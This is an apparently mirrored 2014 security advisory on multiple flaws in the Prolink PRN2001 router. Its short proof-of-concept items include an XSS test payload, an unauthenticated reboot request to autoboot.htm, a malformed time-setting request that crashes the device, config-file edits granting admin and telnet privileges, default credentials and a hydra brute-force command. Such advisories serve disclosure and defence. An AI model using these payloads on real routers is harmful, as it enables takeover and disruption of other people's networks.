扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 |
Exploit Title: Prolink PRN2001 Multiple Vulnerabilities 1. -Advisory Information- Title: Prolink PRN2001 Multiple Vulnerabilities Firmware: Ver 1.2 Firmware URL: http://www.prolink2u.com/download/fw/fw_PRN2001_V1.2_20130323.zip Vendor Homepage: http://www.prolink2u.com/ Author: Herman Groeneveld aka sh4d0wman Tested On: Windows 7 / Kali Date published: Dec 01 2014 Release mode: Coordinated release 2. -Vulnerability Information- PROLiNK® PRN2001 Wireless- N Broadband AP / Router is the ideal wireless solution most suited for home and small-businesses. Designed to support wireless speeds of up to 150Mbps, the PRN2001 offers stellar performance on the 2.4GHz frequency band. This top-notch home networking device functions as an Access Point, Router or a Universal Repeater. Multiple vulnerabilities have been discovered in this router. The majority require a valid account on the device to exploit. Default credentials are: admin/password In the default configuration all vulnerabilities are restricted to exploitation over the LAN/WLAN interfaces. A successful compromise would give an attacker full control over the device. This would enable an attacker to enable remote device management over the WAN interface. 3. - Technical Description / Proof of Concept Code - Introduction: The following type of vulnerabilities have been discovered in the device: - 3.1: CWE-286: Incorrect User Management - 3.2: CWE-668: Exposure of Resource to Wrong Sphere - 3.3: CWE-200: Information Exposure - 3.4: CWE- 80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) - 3.5: CWE-730: OWASP Top Ten 2004 Category A9 - Denial of Service - 3.6: CWE-933: OWASP Top Ten 2013 Category A5 - Security Misconfiguration Technical Description: -------------------------------------------------------------- 3.1 -Class: CWE-286: Incorrect User Management- Description: insufficient separation of privileges. Any account with user-level privileges has the following privileges in the web-management interface: - Create new users with administrative privileges - Upgrade the device firmware - Download and upload configuration files PoC: users could escalate their privileges by creating a new account. -------------------------------------------------------------- 3.2 -CWE-668: Exposure of Resource to Wrong Sphere- Description: a user-level account is not restricted from exporting or importing a device configuration file. The configuration file "config.img" is stored as plain-text XML. This is the root cause for the following vulnerabilities: --------------------------------------------------------------- Name: privilege escalation through device configuration file Description: the plaintext XML configuration file leaks the administrative user and password of the device giving an attacker full control over the device. PoC: administrative accounts have Flag value 0x0: <chain N="USERNAME_PASSWORD"> <V N="FLAG" V="0x0"/> <V N="USERNAME" V="admin"/> <V N="PASSWORD" V="password"/> <V N="PRIORITY" V="0x2"/> </chain> --------------------------------------------------------------- Name: telnet privilege escalation through device configuration file Description: in the plaintext XML configuration file any administrative user account is set to: <V N="PRIORITY" V="0x2"/>. When this value is changed to <V N="PRIORITY" V="0x1"/> the account gains the following additional command options in a telnet shell: - chksum: Check sum checking. Syntax: chksum address length - dhcp: Enable DHCP client - disable: Turn off privileged commands - enable: Turn on privileged commands - loaddll: Unknown functionality / DoS: issuing loaddll crashes the device - script: Run specified script - system: Show general system information - webdll: Unknown functionality - xfile: File copy functionality - xip: Resolve dns -------------------------------------------------------------- 3.3 -CWE-200: Information Exposure- Description: the device is leaking various kinds of sensitive information which can aid the attacker in vulnerability discovery and/or escalate privileges. Vulnerable Functions: -------------------------------------------------------------- Name: configuration-file sensitive information disclosure Description: the XML configuration file "config.img" can be exported by user-level accounts and is stored as plain-text. The following sensitive information is leaked: Confidentiality Related: - Plaintext administrative credentials - Plaintext user-level credentials - Plaintext PPoE WAN credentials - Plaintext WEP key | WPA PSK | WSC Pin Device Integrity Related: - Create, Modify or Delete accounts: PoC: change anything inside the chain or delete the complete chain: <chain N="USERNAME_PASSWORD"> <V N="FLAG" V="0x0"/> <V N="USERNAME" V="admin"/> <V N="PASSWORD" V="password"/> <V N="PRIORITY" V="0x2"/> </chain> - Enabling Device Management over WAN: PoC: modify NATRULE_INSRC_STATIC to allow web and or telnet device management over the WAN port. - DNS traffic redirection: PoC: modify DHCP Assigned DNS settings to point clients to a rogue DNS server. -------------------------------------------------------------- Name: log-file sensitive information disclosure Description: logging is disabled by default. When it is enabled any valid user-level or administrative accounts can view this log through the web-management interface. Invalid logon attempts show the username and invalid passwords in plaintext. If a user does misspell his password an attacker has a high chance of guessing the correct password. Data Exposed: - Usernames - Passwords (partial) -------------------------------------------------------------- Name: telnet sensitive information disclosure Description: the telnet command "show web" lists the complete web structure which can aid an attacker in vulnerability discovery. PoC: the following URL's are leaked and not available through the default web-management interface: - dhcpvendortbl_withoutcheck.htm - debug.htm -------------------------------------------------------------- 3.4 -CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)- Description: the web-based device management interface is vulnerable to persistent XSS attacks caused by insufficient input validation. A valid account on the router is needed to exploit the vulnerabilities. Vulnerable Functions: -------------------------------------------------------------- URL: ddns.htm Field(s): hostname, username PoC: insert into both fields: <script>alert(String.fromCharCode(88,83,83));</script> XSS Execution: - When the dyndns settings page is requested in the web-interface - if logging is enabled: loading the system log in the web-interface -------------------------------------------------------------- URL: login.htm Fields: username PoC: insert as username: <script>alert(String.fromCharCode(88,83,83));</script> XSS Execution: - if logging is enabled: loading the system log in the web-interface -------------------------------------------------------------- URL: config.img Field(s): any of the above values but modified through the configuration file (XML). Description: the configuration file is stored in plain-text. Above injection can be carried out by inserting the XSS test-string into XML elements. Execution takes place inside the web-management interface when browsed to the vulnerable url's. XSS Execution: - same locations as previous disclosed injections but in XML, username injection example: <V N="USERNAME" V="[XSS Inject Here]"/> <V N="PASSWORD" V="test"/> -------------------------------------------------------------- 3.5 -CWE-730: OWASP Top Ten 2004 Category A9 - Denial of Service- Description: un-authenticated and authenticated users can perform various actions which result in the router crashing and rebooting. In this process all LAN, WAN and Wireless connections are dropped. Vulnerable Functions: -------------------------------------------------------------- Name: Unauthenticated device DoS Description: sending a request to [device ip]/autboot.htm in the web-management interface will initiate a factory-default reboot. In this process all LAN, WAN and Wireless connections are dropped. Device settings however remain unchanged. PoC: GET request to [deviceip]/autoboot.htm -------------------------------------------------------------- Name: Authenticated device DoS through invalid firmware update Description: authenticated users could crash the device by uploading a large file as firmware upgrade. The device has no checks in place before the upload is accepted. After a certain amount of data is uploaded the device will initiate a reboot, most likely to resource exhaustion of either the memory or local disk space. PoC: upload any big file as firmware image -------------------------------------------------------------- Name: Authenticated Telnet custom command device DoS Description: various custom telnet commands can be unlocked through the configuration file. Executing the "loaddll" command without any parameters will crash and reboot the device. PoC: gain special privileges and issue the loaddll inside the telnet shell -------------------------------------------------------------- Name: Authenticated NTP Date HTTP Request device DoS Description: the web-management interface allows time configuration by authenticated users. If certain parts are modified the device will crash and reboot. PoC: POST form2systime.cgi?year=1975&month=Jan&day=1&hour=0&min=19&sec=24&daylightsaving=6&submit.htm%3Ftime.htm=send Insert junk (for example: A*400) in Year, Month or Day and the device will crash. -------------------------------------------------------------- 3.6 -CWE-933: OWASP Top Ten 2013 Category A5 - Security Misconfiguration- Description: various configuration settings do not conform to general recommended security best practices weakening the device's security posture. Vulnerable Functions: -------------------------------------------------------------- Name: configuration error Description: when new user accounts are created through the web-management interface the default permissions are root-level and these can't be changed to user-level. However intercepting the HTTP request and modifying the permissions parameter to user-level results in the creation of a user account with user-level privileges. Parts of the web management interface will be restricted. PoC: enter a valid name and password, change the privilege level to 1 (root priv) or 2 (user priv): username=[name]&privilege=[2]&newpass=[pass]&confpass=[pass]&adduser=Add&hiddenpass=$submit.htm%Fuserconfig.htm=Send -------------------------------------------------------------- Name: unencrypted device management protocols Description: the router can be managed either through the web-management interface which sends HTTP traffic or by Telnet. Both protocols use plaintext communications which could allow an attacker to intercept and/or modify this traffic. -------------------------------------------------------------- Name: password complexity and lockout policy Description: no password complexity is enforced, the minimum length is 1 character. No lockout mechanism does exist for the web-management interface. This enables an attacker to guess a correct username / password combination through password guessing or brute-forcing. Weak passwords give an attacker a higher chance of success. The telnet service features a lockout policy; it disconnects any client after three wrong login attempts. PoC: hydra [ip] -l admin -P /root/Desktop/pass.txt -f -v -t 1 http-post-form '/login.cgi:username=^USER^&password=^PASS^&submit.htm%3Flogin.htm=Send:F=Username or password error' -------------------------------------------------------------- 4. -Vendor Information, Solutions and Workarounds- Date 10-10-2014 - Vulnerabilities discovered Date 20-10-2014 - Contacted vendor by e-mail for responsble disclosure, informed them of release date December 1st 2014 No Reply Date 01-11-2014 - Contacted vendor by e-mail No Reply Date 15-11-2014 - Contacted vendor by e-mail No Reply Date 01-12-2014 - Public Disclosure 5. -Author- This vulnerability was discovered and researched by: Herman Groeneveld aka sh4d0wman I am a freelance security consultant / researcher based in Phnom Penh Looking for career opportunities, fellow researchers, help in unpacking the encrypted firmware :-) herman_worldwide [at] hotmail [.co]m |
体验盒子
